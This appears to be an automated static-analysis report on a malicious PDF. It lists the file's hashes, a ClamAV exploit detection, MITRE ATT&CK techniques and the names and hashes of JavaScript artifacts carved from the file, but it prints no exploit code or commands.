Malicious PDF — malware analysis report

Static analysis result for SHA-256 a339988f2ab73048…

MALICIOUS

PDF

45.0 KB
MD5: 5569df0e894021a645c4d65ea0c5462e SHA-1: 0e2007f2b0e4d0a1a31c22ee1b5edde585ca8864 SHA-256: a339988f2ab73048c06c162fdb70c742062b0dee4678992767206dafa8ad9964
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The critical ClamAV heuristic indicates the file is malicious, specifically identified as 'Pdf.Exploit.Agent-36128'. Low-severity heuristics confirm the presence of embedded JavaScript within the PDF structure. While the document body is uninformative, the presence of JavaScript actions and streams strongly suggests an exploit is being used to execute code. The primary attack vector appears to be leveraging a PDF vulnerability to run malicious JavaScript, which is commonly used to download and execute further stages of malware.

Heuristics 3

  • ClamAV: Pdf.Exploit.Agent-36128 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
29e305e148515d6ad762776607013c8253b4e769d70efbd830667b84872d7387		 pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 45305 bytes
legacy_pdfkit_stage_000.js
758dda3ce6d59ef37e0e319d39ac2111270f07fb8583c9e9e1b3f463f4ffcdf9		 deobfuscated-js double percent-decoded annotation JavaScript at offset 0x1E7 33047 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.